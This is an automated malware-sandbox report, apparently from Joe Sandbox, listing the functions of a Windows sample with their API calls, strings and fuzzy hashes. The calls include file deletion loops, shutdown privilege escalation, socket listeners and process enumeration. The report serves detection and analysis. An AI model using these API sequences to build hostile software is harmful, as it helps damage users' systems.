Part of subcall function 00074750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00074743,?,?,000737AE,?), ref: 00074770

Part of subcall function 000D4A31: GetFileAttributesW.KERNEL32(?,000D370B), ref: 000D4A32

FindFirstFileW.KERNEL32(?,?), ref: 000D3B89
DeleteFileW.KERNEL32(?,?,?,?), ref: 000D3BD9
FindNextFileW.KERNEL32(00000000,00000010), ref: 000D3BEA
FindClose.KERNEL32(00000000), ref: 000D3C01
FindClose.KERNEL32(00000000), ref: 000D3C0A

Strings

\*.*, xrefs: 000D3B5B

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: a06562b54a97162a6642a2baab6e57dd3a588f9c0dcb99463b05d55adc6909dd
Instruction ID: 52551a543421a474fb510dcf2be152bb7cb9a30236d3fbd6e55965bb32b2d050
Opcode Fuzzy Hash: a06562b54a97162a6642a2baab6e57dd3a588f9c0dcb99463b05d55adc6909dd
Instruction Fuzzy Hash: 97319E314083859BC301EF64C8958FFB7E8AF95310F408D2EF4D992292EB249A08CB67

Function 000D51BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 000C87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 000C882B
Part of subcall function 000C87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 000C8858
Part of subcall function 000C87E1: GetLastError.KERNEL32 ref: 000C8865

ExitWindowsEx.USER32(?,00000000), ref: 000D51F9

Strings

@, xrefs: 000D51EC
SeShutdownPrivilege, xrefs: 000D51C9
, xrefs: 000D51E7

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 8c2c7b0d18cbaced4c1798b2b8bf169a0db4b41fb871b3e785b342d1d04f4ae9
Instruction ID: 8755517516a14287f4a26a7b9eb3b78cc28385cfc1c74cc74f3fc06682763887
Opcode Fuzzy Hash: 8c2c7b0d18cbaced4c1798b2b8bf169a0db4b41fb871b3e785b342d1d04f4ae9
Instruction Fuzzy Hash: 7201F731791B126BF7786268AC8BFBF72A89B06742F240526FD13E22D2DA555C0485B4

Function 000E6283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 000E62DC
WSAGetLastError.WSOCK32(00000000), ref: 000E62EB
bind.WSOCK32(00000000,?,00000010), ref: 000E6307
listen.WSOCK32(00000000,00000005), ref: 000E6316
WSAGetLastError.WSOCK32(00000000), ref: 000E6330
closesocket.WSOCK32(00000000,00000000), ref: 000E6344

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 7538d08b18d4a79bfd7c85a61cf156eada2309278763c7670cc1ec306b7b66aa
Instruction ID: 6f75727b9417a9c777bf04c5044e9ad324655a8d371e5deee825e0a10d7ee28a
Opcode Fuzzy Hash: 7538d08b18d4a79bfd7c85a61cf156eada2309278763c7670cc1ec306b7b66aa
Instruction Fuzzy Hash: B821D0306002019FDB10EF64D885BBEB7F9EF49760F148159E82AA73D2CB74AD01DB51

Function 00085520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00090DB6: std::exception::exception.LIBCMT ref: 00090DEC
Part of subcall function 00090DB6: __CxxThrowException@8.LIBCMT ref: 00090E01

_memmove.LIBCMT ref: 000C0258
_memmove.LIBCMT ref: 000C036D
_memmove.LIBCMT ref: 000C0414

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: 386fa761d49ecd9ead5ab86510df261e7e91b69df746b002d6e04f7481a6e5dd
Instruction ID: 6c0f6d57e61990b588525fcad2f8588013446d2a5a8ef5cfb8dc1b4622fb8ecd
Opcode Fuzzy Hash: 386fa761d49ecd9ead5ab86510df261e7e91b69df746b002d6e04f7481a6e5dd
Instruction Fuzzy Hash: B802AEB0A00209EFCF14DF64D985AAEBBF5FF44300F148069E84ADB256EB35DA51CB95

Function 00071287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00072612: GetWindowLongW.USER32(?,000000EB), ref: 00072623

DefDlgProcW.USER32(?,?,?,?,?), ref: 000719FA
GetSysColor.USER32(0000000F), ref: 00071A4E
SetBkColor.GDI32(?,00000000), ref: 00071A61

Part of subcall function 00071290: DefDlgProcW.USER32(?,00000020,?), ref: 000712D8

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 87dca92e750356168fddd2c4d8559c9b0c83a79d29a50be56aead6414775a3b1
Instruction ID: a74e805e1f9a0ac727c9564b3306516d27e33b9b21594c5d5a6061f046009fc4
Opcode Fuzzy Hash: 87dca92e750356168fddd2c4d8559c9b0c83a79d29a50be56aead6414775a3b1
Instruction Fuzzy Hash: 81A14570906548BAE738AA6C8C45DFF35DDDF46341B14821AF20AD55D3DA2CDD01A2BB

Function 000DBCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 000DBCE6
_wcscmp.LIBCMT ref: 000DBD16
_wcscmp.LIBCMT ref: 000DBD2B
FindNextFileW.KERNEL32(00000000,?), ref: 000DBD3C
FindClose.KERNEL32(00000000,00000001,00000000), ref: 000DBD6C

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: b64c1a31c438b7e8ce72d179f3bcdba2cddc6e00959bf7d3471cac5dc293cd0f
Instruction ID: 89bfe79b2b0f61821f43438fe41fd39bd507517a0ab5638358835071966cc470
Opcode Fuzzy Hash: b64c1a31c438b7e8ce72d179f3bcdba2cddc6e00959bf7d3471cac5dc293cd0f
Instruction Fuzzy Hash: 4B516E35A04702DFD714DF68C490EAAB7E5EF49320F11455EE95A873A2DB34ED04CBA1

Function 000E6747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 000E7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 000E7DB6

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 000E679E
WSAGetLastError.WSOCK32(00000000), ref: 000E67C7
bind.WSOCK32(00000000,?,00000010), ref: 000E6800
WSAGetLastError.WSOCK32(00000000), ref: 000E680D
closesocket.WSOCK32(00000000,00000000), ref: 000E6821

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: 59e3e327b96f5ba5d38ba1c1ae549f05c4a328b051bc37a4af43033184fb60b4
Instruction ID: 2b24be0464f3741c5e5e37a95538c823496004827afb561ea9c1c1dbdbbfe3ac
Opcode Fuzzy Hash: 59e3e327b96f5ba5d38ba1c1ae549f05c4a328b051bc37a4af43033184fb60b4
Instruction Fuzzy Hash: B541B075A00200AFEB60AF249C86FBE77E89F45754F04C458F959AB3D3CA789D0187A6

Function 000F5376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 000F53C5
IsWindowEnabled.USER32 ref: 000F53D3
GetForegroundWindow.USER32(?,?,00000001), ref: 000F53E0
IsIconic.USER32 ref: 000F53EE
IsZoomed.USER32 ref: 000F53FC

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 99857949c190a2d8a973f9ae463b27be66e3e27d55a473695f4da2336b259a50
Instruction ID: 0c6a4f787da5a61452841f4d3d0dce87d09e332488e749b4bead11a42c577f8a
Opcode Fuzzy Hash: 99857949c190a2d8a973f9ae463b27be66e3e27d55a473695f4da2336b259a50
Instruction Fuzzy Hash: 331108317009166FE7215F2A9C44B7E7BD8EF457A2B004028FB45D3642CF78DD01D6A5

Function 000C80A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 000C80C0
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 000C80CA
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 000C80D9
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 000C80E0
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 000C80F6

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: b23b568de3b0d8a51ffd7a8d648a83f3f55ee9d8a6de4f81339358eec12b881a
Instruction ID: b5ab15bca3a80cb412d7b26031f12b84ca30aec8ab3ff519202095e4d4387277
Opcode Fuzzy Hash: b23b568de3b0d8a51ffd7a8d648a83f3f55ee9d8a6de4f81339358eec12b881a
Instruction Fuzzy Hash: 25F03731240205AFEB105FA5EC89E7B3BECEF89755B044029F949C6250CB659D92EB60

Function 000DC397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 000DC432
CoCreateInstance.OLE32(00102D6C,00000000,00000001,00102BDC,?), ref: 000DC44A

Part of subcall function 00077DE1: _memmove.LIBCMT ref: 00077E22

CoUninitialize.OLE32 ref: 000DC6B7

Strings

.lnk, xrefs: 000DC3C6, 000DC3EE, 000DC3F8

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: fb255a09b2e710741f685e382f06a0f329da6bc5ac4843e0dc2a28e0c9afa3a5
Instruction ID: b62c37a6d6c733ff00ab4fa7da9c76e28e99d2b3ff2d32195d42d9333ff9ce1c
Opcode Fuzzy Hash: fb255a09b2e710741f685e382f06a0f329da6bc5ac4843e0dc2a28e0c9afa3a5
Instruction Fuzzy Hash: 43A14B71504205AFD300EF54C881EAFB7E8FF89354F00895DF1599B2A2EB75EA09CB66

Function 00074B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00074AD0), ref: 00074B45
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00074B57

Strings

GetNativeSystemInfo, xrefs: 00074B51
kernel32.dll, xrefs: 00074B40

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: c56e37a9740730b736e129eb6fedd520520460d736c4545638d4108307a9fb6e
Instruction ID: d000e47eec733139437a9fc8a4e194d400ded9f07cea350c0f1c8b693d43354f
Opcode Fuzzy Hash: c56e37a9740730b736e129eb6fedd520520460d736c4545638d4108307a9fb6e
Instruction Fuzzy Hash: 10D01234A10717CFD7209F31D868B3676E4AF05351B11C8399585D6A50D778D880D659

Function 00083030 Relevance: 6.6, APIs: 4, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: 43c8f48e3820af32ac93fe3932183296b65b9e86cc9fee10c664c69dbae47394
Instruction ID: b2568737df8377178f322361d6ae045bf0b752e78308b4b9ddfdc38f28700b08
Opcode Fuzzy Hash: 43c8f48e3820af32ac93fe3932183296b65b9e86cc9fee10c664c69dbae47394
Instruction Fuzzy Hash: AC227D716083019FC764EF14C891BAEB7E4BFC4B10F14492DF99A97292DB75EA04CB92

Function 000EEE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 000EEE3D
Process32FirstW.KERNEL32(00000000,?), ref: 000EEE4B

Part of subcall function 00077DE1: _memmove.LIBCMT ref: 00077E22

Process32NextW.KERNEL32(00000000,?), ref: 000EEF0B
CloseHandle.KERNEL32(00000000,?,?,?), ref: 000EEF1A

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: fecab783834273485980846f81bb31feb1e7393a45c7d0d9f25cca3a7882de1d
Instruction ID: 809015590fe104d04f1e1b23feb37e2cd555522fdeef55e67fcf90d435282735
Opcode Fuzzy Hash: fecab783834273485980846f81bb31feb1e7393a45c7d0d9f25cca3a7882de1d
Instruction Fuzzy Hash: 7851A371904345AFD310EF24DC85EABB7E8FF84750F10882DF599972A2EB74A904CB96

Function 000CE616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 000CE628

Strings

|, xrefs: 000CE658
(, xrefs: 000CE66E

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 8db07d60f726f65123351e7d5fe3936974bed7766360e8ae786b1c496e7ecc40
Instruction ID: fa42bf345638769fd0df8cd7b97fc39e3df3dd4e8092ad5a5cb9e77e58644911
Opcode Fuzzy Hash: 8db07d60f726f65123351e7d5fe3936974bed7766360e8ae786b1c496e7ecc40
Instruction Fuzzy Hash: 27321475A046059FDB28CF19C481EAAB7F1FF48310B15C56EE89ADB3A2D770E941CB44

Function 000E22EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,000E180A,00000000), ref: 000E23E1
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 000E2418

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 5dddd772b2f4ed52157dc66665cd307c5943009a647407f34bae84df34279f0a
Instruction ID: 62db3fe3058e52273ff88558d56726735e5b16289a92db676afe6fd14ba7aef9
Opcode Fuzzy Hash: 5dddd772b2f4ed52157dc66665cd307c5943009a647407f34bae84df34279f0a
Instruction Fuzzy Hash: 4E41D4B1A04249BFEB20DEA6DC81FBFB7FCEB40314F10402AF651B6181DB749E41AA50

Function 000DB333 Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 000DB343
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 000DB39D
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 000DB3EA

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 86b1e79ddf1408841306d76fd741195ecbcfe0f31e2871d78b2da50d02d27cd2
Instruction ID: e461536c6c669e71070cb0fdf8f5a7da1e284f785b698d6f9734958117e4925c
Opcode Fuzzy Hash: 86b1e79ddf1408841306d76fd741195ecbcfe0f31e2871d78b2da50d02d27cd2
Instruction Fuzzy Hash: 00217435A00508EFCB00DF95D881EFDBBB8FF49310F1480AAE905AB351CB359955DB65

Function 000C87E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00090DB6: std::exception::exception.LIBCMT ref: 00090DEC
Part of subcall function 00090DB6: __CxxThrowException@8.LIBCMT ref: 00090E01

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 000C882B
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 000C8858
GetLastError.KERNEL32 ref: 000C8865

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 8dfcf8d9bff88bc63d0abe308d38d77a9d3e29d20e7fd6c0f87c0d527a16c0ea
Instruction ID: b7bd088409c1ffc80ee73a93c99ca71524e69e35d460b4319650f8c8a558d938
Opcode Fuzzy Hash: 8dfcf8d9bff88bc63d0abe308d38d77a9d3e29d20e7fd6c0f87c0d527a16c0ea
Instruction Fuzzy Hash: 36116DB2414205AFEB18DFA4DC85D7BB7E8EB44711B20852EE45597641EE30AC458B64

Function 000C874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 000C8774
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 000C878B
FreeSid.ADVAPI32(?), ref: 000C879B

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

